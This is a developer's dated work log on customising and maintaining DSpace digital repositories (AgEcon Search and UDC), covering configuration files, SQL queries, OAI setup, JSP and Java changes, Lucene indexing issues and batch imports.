java.lang.ArrayIndexOutOfBoundsException
SKIPPED: bitstream 16249 because 'Volume_II-Appendix2.pdf.txt' already exists
ERROR filtering, skipping bitstream #16248 java.lang.ArrayIndexOutOfBoundsException
java.lang.ArrayIndexOutOfBoundsException
SKIPPED: bitstream 15486 because 'AHC_FacilitiesMasterPlan.pdf.txt' already exists
SKIPPED: bitstream 13492 because 'Vet_med_facilities_development_plan_FINAL.pdf.txt' already exists
SKIPPED: bitstream 13490 because 'SPH_CONSOLIDATION.pdf.txt' already exists
SKIPPED: bitstream 13488 because 'AHC_strategic_facility_plan_1998.pdf.txt' already exists
SKIPPED: bitstream 13486 because 'AHC_Precinct_Plan_Report_Final_May_2006.pdf.txt' already exists
SKIPPED: bitstream 13484 because 'AHC_Mpls_District_Plan_2000.pdf.txt' already exists
Creating search index:
Creating browse index
Indexing all Items in DSpace....2008-02-11 08:17:24,358 
  INFO  org.dspace.core.ConfigurationManager @ DSpace logging installed using log4j.properties
2008-02-11 08:17:25,315 
   INFO  org.dspace.content.MetadataField @ Loading MetadataField elements into cache.
2008-02-11 08:17:25,357 
   INFO  org.dspace.content.MetadataSchema @ Loading schema cache for fast finds
 ... Done
Creating search index
2008-02-11 08:19:57,683 INFO  org.dspace.core.ConfigurationManager @ 
   DSpace logging installed using log4j.properties

Some basic information on Dspace

Possible ant tasks

ant compile
ant build_wars
ant update
ant install_code
ant init_configs
ant setup_database
ant clean_database
ant load_registries
ant fresh_install
ant clean
ant public_api
ant javadoc

Some important boxes

UDC sandbox
http://odin.lib.umn.edu:9040/dspace-ir/

We set up a virtual machine for strip one and two.
strip1vm.oit.umn.edu 160.94.138.139
strip3vm.oit.umn.edu 160.94.138.140

Miscellaneous

Version that we use: DSpace Version 1.4.1, 8-December-2006
Approximate size of the asset store: 73G
Server version: Apache/2.0.52
On strip1, the Library specific apache configs are kept in /opt/httpd/conf.d

June 20, 2008

Host Based Access on Postgres and DSPACE ... pg_hba.conf

The pg_hba.conf file controls remote access to postgres.
On strip 3 of our DSPACE instance there are two of these files:

/opt/pgsql/data/pg_hba.conf
/var/lib/pgsql/data/pg_hba.conf


/var/lib/pgsql/data/pg_hba.conf is the live one.

June 18, 2008

SQL select to get author, handle, date_issued and title from the postgres DB

select itemsbytitle.title, handle.handle, itemsbydate.date_issued, itemsbyauthor.author
from ((itemsbytitle
INNER JOIN handle ON itemsbytitle.item_id = handle.resource_id)
INNER JOIN itemsbydate ON itemsbydate.item_id = itemsbytitle.item_id)
INNER JOIN itemsbyauthor ON itemsbyauthor.item_id = itemsbytitle.item_id
where resource_id = 8137;

June 12, 2008

Information on Journal in AgEcon from Brad Teale

Hi Jeff,

The Journal listing is created in the Community.java class under org/dspace/content. It is using the following SQL statement:

SELECT DISTINCT(community.community_id), name, short_description, introductory_text, logo_bitstream_id, copyright_text, side_bar_text
FROM community, community2item
WHERE community2item.item_id IN
  (SELECT item_id FROM metadatavalue
   WHERE metadata_field_id=(SELECT metadata_field_id FROM metadatafieldregistry WHERE element='type' AND qualifier IS NULL)
   AND text_value IN ('Journal Article', 'Submitted Journal Article'))
AND community.community_id=community2item.community_id
ORDER BY (name) ASC;

Basically, it is looking in the metadatafieldregistry table for element=type and an empty qualifier with a text_value of either: Journal Article or Submitted Journal Article. These were the terms defined during the initial requirements gathering of these pages. If something else is defined as a Journal type it does require a code change. It would be nice to move these text_value values into the configuration so changes don't require code modifications.

Let me know if you have additional questions.

Brad

May 28, 2008

AgEcon MetaData

Below is a list of all the metadata used by AgEcon. Note
metadata_schema_id = 1 refers to dc,
metadata_schema_id = 2 refers to agecon.
AgEconMetadata.html

May 23, 2008

AgEcon OAI URL

Naming OAI handler

I have enabled OAI on AgEcon Search. It can be reached at the URL:
http://strip1.oit.umn.edu:8080/dspace_sr-oai/request?verb=Identify


John Chapman gave me a list of common OAI sites:

http://gita.grainger.uiuc.edu/registry/ListAllRepos.asp


Of the URLs there I like the one below the best:

XML/XSD/XSL Registry (xmlregistry.oclc.org)
http://alcme.oclc.org/xmlregistry/OAIHandler?verb=Identify

It does not have an explicit IP or refer to a specific technology, so it would be easy to maintain as AgEcon migrates from box to box and from one technology to the next.

So based on that I plan on using:
http://ageconsearch.umn.edu/OAIHandler?verb=Identify
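For reference, every OAI-PMH request is just the handler URL plus a verb and optional arguments. The sketch below is a small, hypothetical helper (OaiRequestUrl is my own name, not part of OAICat or DSpace) that builds such URLs. The base URL is the one planned above; the ListRecords call with metadataPrefix=oai_dc is only an illustrative second request.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;
import java.util.LinkedHashMap;
import java.util.Map;

// Hypothetical helper for building OAI-PMH request URLs.
class OaiRequestUrl {

    /** Returns baseUrl?verb=VERB followed by &name=value for each extra argument. */
    static String build(String baseUrl, String verb, Map<String, String> args) {
        StringBuilder sb = new StringBuilder(baseUrl);
        sb.append("?verb=").append(encode(verb));
        for (Map.Entry<String, String> arg : args.entrySet()) {
            sb.append('&').append(encode(arg.getKey()))
              .append('=').append(encode(arg.getValue()));
        }
        return sb.toString();
    }

    private static String encode(String value) {
        try {
            return URLEncoder.encode(value, "UTF-8");
        } catch (UnsupportedEncodingException e) {
            // UTF-8 is always available on a Java runtime.
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        String base = "http://ageconsearch.umn.edu/OAIHandler";
        System.out.println(build(base, "Identify", new LinkedHashMap<String, String>()));

        Map<String, String> listArgs = new LinkedHashMap<String, String>();
        listArgs.put("metadataPrefix", "oai_dc");
        System.out.println(build(base, "ListRecords", listArgs));
    }
}
```

Because only the base URL is site specific, a harvester would not need to change anything else if the handler moves to another box.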

Changes in config files

The changes below were required for OAI to come to life:

File: ./config/dspace.cfg
config.template.oaicat.properties = ${dspace.dir}/config/oaicat.properties ... old
config.template.oaicat.properties = ${dspace.dir}/config/templates/oaicat.properties ... new

File: ./build.xml
./build.xml:281: <replace file="${dspace.dir}/config/templates/oaicat.properties"
./build.xml:285: <replace file="${dspace.dir}/config/templates/oaicat.properties"

File: ./etc/oai-web.xml
./etc/oai-web.xml:66: @@dspace.dir@@/config/templates/oaicat.properties

Test OAI handler

http://odin.lib.umn.edu:9030/dspace-oai/request

OAI jar information

[silvi003~/Documents/workspace/dspace-sr/lib]$ dumpManifest oaicat.jar
Manifest-Version: 1.0
Ant-Version: Apache Ant 1.6.1
Created-By: 1.4.1_01-b01 (Sun Microsystems Inc.)
Specification-Title: OAI-PMH
Specification-Version: 2.0
Specification-Vendor: Open Archives Initiative
Implementation-Title: OAICat
Implementation-Version: 1.5.48 October 23 2006
Implementation-Vendor: OCLC, Online Computer Library Center
Implementation-URL: http://www.oclc.org/research/software/oai/cat.shtm

To get the jar go to: OCLC software

Info on OAI tools

OAIToolsFinal.pdf

April 22, 2008

Simple jsp form in dspace and jsp to read it

Jen made the JSP form below:

new-user_direct-email.jsp

I wrote the JSP below to catch the result:

mail_request_for_new_user.jsp

This is a simple chunk of code, but I may reuse it.

March 27, 2008

odin ssl certificates

There have been some problems with the viewing of certain images in both UDC and AgEcon from odin.lib.umn.edu. We believe this was due to certificates that I made using the java tool. I replaced my certificate with one made by Brad.

March 12, 2008

Comment out UDC email updates

There is a link called "email updates" that should allow a user to subscribe to information about new submits. It is broken and for now has been commented out. Below are the commented out lines:

[silvi003~/Documents/workspace/dspace-ir]$ xff -B 2 -A 2 'get.email.updates'
./jsp/local/layout/navbar-default.jsp-232-<!--
./jsp/local/layout/navbar-default.jsp-233- <td nowrap="nowrap" class="navigationBarItem">
./jsp/local/layout/navbar-default.jsp:234: <a class="navigationBarItem" href="<%= request.getContextPath() %>/subscribe">get email updates</a>
./jsp/local/layout/navbar-default.jsp-235- </td>
./jsp/local/layout/navbar-default.jsp-236- </tr>
--
./jsp/local/layout/navbar-home.jsp-152- <!--
./jsp/local/layout/navbar-home.jsp-153- <td nowrap="nowrap" class="navigationBarItem">
./jsp/local/layout/navbar-home.jsp:154: <a class="navigationBarItem" href="<%= request.getContextPath() %>/subscribe">get email updates</a>
./jsp/local/layout/navbar-home.jsp-155- </td>
./jsp/local/layout/navbar-home.jsp-156- -->

March 3, 2008

Changing the display mode for AgEcon

Two files had to be changed to make a few new fields visible in the standard output.

Changes to dspace.cfg

The following section of dspace.cfg was modified.

Changes to ItemTag.java

ItemTag.java had to be modified to properly read the new dspace.cfg.

Future changes

If fields need to be changed in the future only dspace.cfg will have to change.

DB commands for Dspace

See if an item id is in the DB.

February 22, 2008

Process to do an itemexport for a collection in dspace

There is a way to extract the items in a collection from dspace so that each takes the form of a plain pdf and a flat xml file. These directories can be batch ingested back into dspace or another repository.

Finding a collection's ID

The file below shows how to find a collection's ID in dspace. getCollectionID

Brad Teale's filter_media.sh script

The filter-media.sh script will find all the handles of all the collections.

Execute the command to extract the data

[silvi003 /dspace/dspace-ir/bin]$ ./dsrun org.dspace.app.itemexport.ItemExport -t COLLECTION -i 29 -d /dspace/assetstore/udc_export/ima/ -n 0

Resulting Directory Structure

Resulting directories from ItemExport command.

February 15, 2008

Check that abort page for license contains no logic for AgEcon

We have moved the license page from the last page of the submit to the first. The wording of the page says that the entry will be saved, but of course there is no entry. The wording can be easily changed, but I needed to check that the jsp was not executing any code (i.e. trying to write to a file or the DB). It is not, so all is well.

January 25, 2008

Hardwire jsp initial questions

The initial questions checkbox on submit workflow needed to be hardwired. So I made all the buttons hidden and used javascript to automatically submit the form. This is a quick and dirty way to hardwire the values in a jsp form.
Original initial-questions.jsp

Hardwired version

Plan to add email field to name type in dspace submit

Currently the name type that is used to generate forms in dspace has two text fields (first and last name). We need a third field for email and below are the steps that must be taken to create this field.

Steps:

1) Copy edit-metadata.jsp to local -> confirm that new jsp is "live"

2) Confirm edu.umn.dspace.submit.step.DescribeStep is alive

3) Make "email_name" type from "name" type ... do not modify any code in "email_name" yet

4) Drop DCPersonName in "email_name" replace with string

5) Add three text fields to "email_name" in edit-metadata.jsp

6) Fix string in "email_name" code in edu.umn.dspace.submit.step.DescribeStep to handle 3rd field

January 11, 2008

Remove upload messages from AgEcon page

The file choose-file.jsp had to be modified:

<%-- <p class="submitFormHelp"><strong>Netscape users please note:</strong> By default, the window brought up by clicking "Browse..." will only display files of type HTML. If the file you are uploading isn't an HTML file, you will need to select the option to display files of other types. <object><dspace:popup page="/help/index.html#netscapeupload">Instructions for Netscape users</dspace:popup></object> are available.</p> --%>

<%-- Louise Letnes and Julia Kelly wanted these messages deleted from the top of the upload page
<div class="submitFormHelp"><fmt:message key="jsp.submit.choose-file.info3"/> <dspace:popup page="/help/index.html#netscapeupload"><fmt:message key="jsp.submit.choose-file.info4"/></dspace:popup></div>
--%>

<%-- FIXME: Collection-specific stuff should go here? --%>

<%-- <p class="submitFormHelp">Please also note that the DSpace system is able to preserve the content of certain types of files better than other types. <object><dspace:popup page="/help/formats.jsp">Information about file types</dspace:popup></object> and levels of support for each are available.</p> --%>

<%-- <div class="submitFormHelp"><fmt:message key="jsp.submit.choose-file.info6"/> <dspace:popup page="/help/formats.jsp"><fmt:message key="jsp.submit.choose-file.info7"/></dspace:popup> </div> --%>

January 7, 2008

Changes to AGEcon Submit -- First Set of Changes

I) Fields to add

1) Items to modify

Here are all the metadata for the agecon project. The items labeled must be added to the submit form.
These items are:
A) hasEndPage
B) hasStartPage
C) ispartofname
D) ispartofnumber
E) ispartoftitle
F) ispartofvolume

B) Changes to the java code

I needed to modify the code shown below from the Item.java class:

public DCValue[] getDC(String element, String qualifier, String lang)
{
    DCValue[] MetaData = getMetadata(MetadataSchema.DC_SCHEMA, element, qualifier, lang);
    if (MetaData.length == 0)
        MetaData = getMetadata("agecon", element, qualifier, lang);
    // return getMetadata(MetadataSchema.DC_SCHEMA, element, qualifier, lang);
    return MetaData;
}

This allows the software to recognize both agecon elements and dc, so the items will appear in the verify step.
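The fallback idea in getDC can be tried outside of DSpace with the standalone sketch below. It is only an illustration: SchemaFallback and its map-backed storage are stand-ins I made up for the real Item and DCValue classes, and the "dc" and "agecon" strings are the two schema names used on this site.

```java
import java.util.HashMap;
import java.util.Map;

// Hypothetical stand-in for an item's metadata; not the DSpace Item class.
class SchemaFallback {
    private final Map<String, String[]> values = new HashMap<String, String[]>();

    void put(String schema, String element, String qualifier, String... vals) {
        values.put(key(schema, element, qualifier), vals);
    }

    /** Returns the stored values, or an empty array when nothing is stored. */
    String[] get(String schema, String element, String qualifier) {
        String[] found = values.get(key(schema, element, qualifier));
        return found == null ? new String[0] : found;
    }

    /** Looks in the dc schema first and falls back to agecon when dc has nothing. */
    String[] getWithFallback(String element, String qualifier) {
        String[] result = get("dc", element, qualifier);
        if (result.length == 0) {
            result = get("agecon", element, qualifier);
        }
        return result;
    }

    private static String key(String schema, String element, String qualifier) {
        return schema + "." + element + "." + qualifier;
    }

    public static void main(String[] args) {
        SchemaFallback item = new SchemaFallback();
        item.put("agecon", "format", "hasStartPage", "12");
        System.out.println(item.getWithFallback("format", "hasStartPage")[0]);
    }
}
```

One consequence of this design is that a dc value always wins: an agecon value is only seen when the dc schema has nothing for the same element and qualifier.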

2) Making changes so that new items appear in search

A) In the file /config/dspace.cfg add lines to webui.itemdisplay.default so that it has the form below:

webui.itemdisplay.default = dc.title, dc.title.alternative, \
    dc.contributor.author, \
    agecon.contributor.authorContact, \
    dc.contributor.editor, \
    agecon.contributor.editorContact, \
    dc.subject, dc.date.issued(date), \
    dc.relation.ispartofseries, \
    dc.description.abstract, \
    dc.description, \
    agecon.relation.ispartoftitle, \
    agecon.relation.ispartofnumber, \
    agecon.relation.ispartofvolume, \
    agecon.relation.ispartofname, \
    agecon.format.hasStartPage, \
    agecon.format.hasEndPage, \
    dc.format.extent, \
    dc.relation

B) In the file config/language-packs/Messages.properties add:

metadata.agecon.relation.ispartoftitle = Journal Title
metadata.agecon.relation.ispartofnumber = Journal Number
metadata.agecon.relation.ispartofvolume = Journal Volume
metadata.agecon.relation.ispartofname = Journal Issue
metadata.agecon.format.hasStartPage = From Page
metadata.agecon.format.hasEndPage = To Page

All the new items are now visible in the dspace search.

II) Move License to the front

In the file item-submission.xml create a new submission process with the license first. Make this submission process the default.

III) Combine two description pages

By eliminating the xml below, which separated two description pages in the file input-forms.xml, I was able to combine the two description pages:
</page>
<page number="2">

January 2, 2008

Possible ant builds for dspace

ant compile
ant build_wars
ant update
ant install_code
ant init_configs
ant setup_database
ant clean_database
ant load_registries
ant fresh_install
ant clean
ant public_api
ant javadoc

December 4, 2007

Location of pdfs after dspace submit

After the dspace submit process, the pdfs are sent to the directory:

/usr/local/dspace-sr-dev/assetstore

and are given cryptic names like:

/usr/local/dspace-sr-dev/assetstore/97/93/57/97935760829952567360200962040412392397


97935760829952567360200962040412392397 is a pdf file.
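Judging from the path above, the three directory levels are simply the first three pairs of digits of the file name. The sketch below reproduces that layout. AssetstorePath is a hypothetical helper, not the DSpace storage code, and the two-digits-per-level, three-level rule is an assumption read off this one example.

```java
// Hypothetical helper; the layout rule is inferred from the example path above.
class AssetstorePath {

    /** Returns "aa/bb/cc/<id>" where aa, bb, cc are the first three digit pairs of the id. */
    static String relativePath(String internalId) {
        if (internalId == null || internalId.length() < 6) {
            throw new IllegalArgumentException("id must have at least 6 characters");
        }
        return internalId.substring(0, 2) + "/"
                + internalId.substring(2, 4) + "/"
                + internalId.substring(4, 6) + "/"
                + internalId;
    }

    public static void main(String[] args) {
        String id = "97935760829952567360200962040412392397";
        // prints /usr/local/dspace-sr-dev/assetstore/97/93/57/97935760829952567360200962040412392397
        System.out.println("/usr/local/dspace-sr-dev/assetstore/" + relativePath(id));
    }
}
```

This is handy when a file name turns up in a log or in the DB and the pdf has to be found on disk.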

files modified for sort (final ingest into UDC)

Last week I did an svn commit to update UDC so that it would sort.
Here are the files that were modified:
M config/dspace.cfg
M src/org/dspace/app/webui/servlet/SimpleSearchServlet.java
M src/org/dspace/search/DSQuery.java
M src/edu/umn/dspace/app/webui/jsptag/ItemListTag.java
M jsp/local/browse/items-by-date.jsp
M jsp/local/browse/items-by-subject.jsp
M jsp/local/browse/items-by-title.jsp
M jsp/local/browse/items-by-author.jsp
M jsp/local/search/results.jsp
M jsp/layout/location-bar.jsp

The two files below were modified during an earlier ingest:
src/org/dspace/search/DSIndexer.java
src/org/dspace/search/QueryArgs.java

see note of November 07, 2007

November 30, 2007

create-administrator ... makes an admin user in dspace

This command-line function steps you through creating an admin user in dspace.

location:
/usr/local/dspace-sr-dev/bin/create-administrator


I had to make changes to the script documented below:
###########################################################################
# Shell script creating a starting administrator account

# Get the DSPACE/bin directory
BINDIR=`dirname $0`

#*****************************************************************
# Within the dspace.jar for Agecon there was no class called:
# edu.umn.dspace.administer.CreateAdministrator
# however I found a class called:
# org/dspace/administer/CreateAdministrator
# I used that jar and this script worked properly
#
#
#$BINDIR/dsrun edu.umn.dspace.administer.CreateAdministrator
#
# J Silvis
# 29 Nov 2007
#*****************************************************************

$BINDIR/dsrun org/dspace/administer/CreateAdministrator

November 7, 2007

Files changed to make ag econ sort

The files below were changed to make ag econ sort, by clicking the headers of the tables.
SR/trunk/config/dspace.cfg
SR/trunk/jsp/local/search/results.jsp
SR/trunk/src/org/dspace/app/webui/servlet/SimpleSearchServlet.java
SR/trunk/src/org/dspace/search/DSIndexer.java
SR/trunk/src/org/dspace/search/DSQuery.java
SR/trunk/src/org/dspace/search/QueryArgs.java
SR/trunk/src/edu/umn/dspace/app/webui/jsptag/ItemListTag.java

This is R 57 in the SVN Repository

October 30, 2007

Adding a new field to the dspace database

In the file ./config/dspace.cfg one finds:

search.index.1 = author:dc.contributor.*

search.index.2 = author:dc.creator.*

search.index.3 = title:dc.title.*

search.index.4 = keyword:dc.subject.*

search.index.5 = abstract:dc.description.abstract

search.index.6 = author:dc.description.statementofresponsibility

search.index.7 = series:dc.relation.ispartofseries

search.index.8 = abstract:dc.description.tableofcontents

search.index.9 = mime:dc.format.mimetype

search.index.10 = sponsor:dc.description.sponsorship

search.index.11 = identifier:dc.identifier.*

search.index.12 = language:dc.language.iso

search.index.13 = date:dc.date.issued

I added the line that is bolded.

After this line is added you must run:

ant init_configs -- update the config system

ant install_code -- compile the indexer code

And then the script below to reindex lucene:

/usr/local/dspace-sr-dev/bin/index-all
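Each search.index.N value above has the form indexname:schema.element.qualifier, where the qualifier may be * or left out. The sketch below splits a value into those parts. SearchIndexEntry is a hypothetical class written for this note, not the parser DSIndexer uses, so treat it only as a way to check a new line before running the ant tasks.

```java
// Hypothetical parser for search.index.N values; not the DSpace implementation.
class SearchIndexEntry {
    final String indexName;
    final String schema;
    final String element;
    final String qualifier; // null when the value has no qualifier part

    private SearchIndexEntry(String indexName, String schema, String element, String qualifier) {
        this.indexName = indexName;
        this.schema = schema;
        this.element = element;
        this.qualifier = qualifier;
    }

    /** Parses a value such as "author:dc.contributor.*" or "date:dc.date.issued". */
    static SearchIndexEntry parse(String value) {
        String[] nameAndField = value.trim().split(":", 2);
        if (nameAndField.length != 2) {
            throw new IllegalArgumentException("expected indexname:field, got " + value);
        }
        String[] parts = nameAndField[1].trim().split("\\.");
        if (parts.length < 2 || parts.length > 3) {
            throw new IllegalArgumentException("expected schema.element[.qualifier], got " + value);
        }
        String qualifier = parts.length == 3 ? parts[2] : null;
        return new SearchIndexEntry(nameAndField[0].trim(), parts[0], parts[1], qualifier);
    }

    public static void main(String[] args) {
        SearchIndexEntry e = parse("date:dc.date.issued");
        System.out.println(e.indexName + " -> " + e.schema + "." + e.element + "." + e.qualifier);
    }
}
```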


October 22, 2007

Report to John and Brad about dspace progress

John & Brad,
Below is what I have done over the last few days with dspace.
Jeff


Attempt to use lucene to sort fields:
1) Examined work by Rooma who attempted to solve the problem.
2) She tried to use the lucene engine to sort the fields -> I tested lucene sort.
3) lucene will not sort tokenized fields.
4) Requests have been sent to lucene and dspace to create sortable tokenized fields. There seems to be some internal debate as to whether this is wise/possible.
5) Used the lucene 2.2 jar to dump all attributes of fields stored in our lucene DB (we are using the 2.0 jar, which does not have this feature, and I will return to the original jar).
6) The "isTokenized" attribute has the value "true" for all the fields except the field named "handle".
7) In its current state, none of the fields of interest are sortable by lucene.

Unique problem of date field:
1) The "date" field is not stored in lucene.
2) Likely generated in the jsp for the 10 records that are displayed.
3) derived from direct call to sql db?

My plans:
1) I talked to Bill and he says there is a way to index a field twice, as both tokenized and non-tokenized. I will explore this idea to make our fields sortable.
2) Brad and I have discussed the "date problem". Could go directly to sql or fix lucene.

Gains:
1) The lucene 2.2 jar allows me to peer into the lucene DB and display all the properties of the stored fields.

Aliases for servlets

From the ./etc/dspace-web.xml file:

<servlet> <servlet-name>subject-search</servlet-name> <servlet-class>org.dspace.app.webui.servlet.ControlledVocabularySearchServlet</servlet-class> </servlet> <servlet> <servlet-name>simple-search</servlet-name> <servlet-class>org.dspace.app.webui.servlet.SimpleSearchServlet</servlet-class> </servlet>

Attributes of the fields in the Lucene database (in dspace) + sortable problem

I used the code in JavaCodeToDumpLuceneAttributes.html and found that the fields in the lucene DB had the attributes listed in dspaceFields.html.

Fields cannot be tokenized if they are to be sortable, so none of the fields other than the handle are sortable.

October 17, 2007

Get logger running for dspace

1) stop tomcat



2) fix log level in dspace config file: dspace.cfg

config.template.log4j.properties = ${dspace.dir}/config/log4j.properties

config.template.log4j-handle-plugin.properties = ${dspace.dir}/config/log4j-handle-plugin.properties

config.template.oaicat.properties = ${dspace.dir}/config/oaicat.properties



3) run the init_configs ant task



4) make new war files

5) tomcat config file:

$CATALINA_HOME/conf/logging.properties contains

java.util.logging.ConsoleHandler.level = FINE

java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter

6) Start tomcat

October 15, 2007

Classes in dspace that touch LUCENE

All Classes that contain Lucene are in the
package org.dspace.search


Input:
./src/org/dspace/search/DSAnalyzer.java -> ./src/org/dspace/search/DSIndexer.java

Query
./src/org/dspace/search/DSTokenizer.java -> ./src/org/dspace/search/DSQuery.java

--------------------------------------------------------------------------------------------

DSIndexer is used by several classes
jgrep -l DSIndexer
./src/org/dspace/app/mediafilter/MediaFilterManager.java
./src/org/dspace/app/webui/servlet/admin/EditItemServlet.java
./src/org/dspace/content/Collection.java
./src/org/dspace/content/Community.java
./src/org/dspace/content/InstallItem.java
./src/org/dspace/content/Item.java
./src/org/dspace/search/DSIndexer.java
./src/org/dspace/search/DSQuery.java


DSQuery is used by several classes
jgrep -l DSQuery
./src/org/dspace/app/webui/servlet/ControlledVocabularySearchServlet.java
./src/org/dspace/app/webui/servlet/SimpleSearchServlet.java
./src/org/dspace/search/DSQuery.java


Other classes found in org.dspace.search
./src/org/dspace/search/Harvest.java
./src/org/dspace/search/HarvestedItemInfo.java
./src/org/dspace/search/QueryArgs.java
./src/org/dspace/search/QueryResults.java

October 12, 2007

Data files for dspace

Location in Odin to svn source files

Get data files from odin and load them in the database

scp -r silvi003@odin.lib.umn.edu:/mnt/agecon_export/dc_mixed_nodata .


Loading the files used the command:
./dsrun edu.umn.dspace.administer.BatchImporter -R -a -e silvi003@umn.edu -s /Users/silvi003/dc_mixed_data/dc_mixed_nodata


I tried to change the code:

In the DSIndexer class, setting
wipe_existing = true;
(it is usually false) allowed the program to run much longer.

Now it dies with:

Exception in thread "main" java.sql.SQLException: bad_dublin_core SchemaID=1, contributor author_contact
at org.dspace.content.Item.update(Item.java:1468)
at org.dspace.content.InstallItem.installItem(InstallItem.java:146)
at edu.umn.dspace.administer.BatchImporter.addItem(BatchImporter.java:670)
at edu.umn.dspace.administer.BatchImporter.addItems(BatchImporter.java:557)
at edu.umn.dspace.administer.BatchImporter.createCommunityStructure(BatchImporter.java:430)
at edu.umn.dspace.administer.BatchImporter.createCommunityStructure(BatchImporter.java:500)
at edu.umn.dspace.administer.BatchImporter.main(BatchImporter.java:267)

log:

2007-10-09 10:12:51,407 WARN org.dspace.content.Item @ silvi003@umn.edu::bad_dc:Bad DC field.
SchemaID=1, element: "contributor" qualifier: "author_contact" value: "Paterson,
Anna (anna@areu.org.af)"

Brad was able to edit the files and get some of the data to load. The word "urban" produced a useful search.

October 1, 2007

Things needed to set up dspace

- download eclipse
- eclipse svn plugin subclipse
- Tomcat
- postgres.jar
- config dspace.cfg files
- also see dspace.org
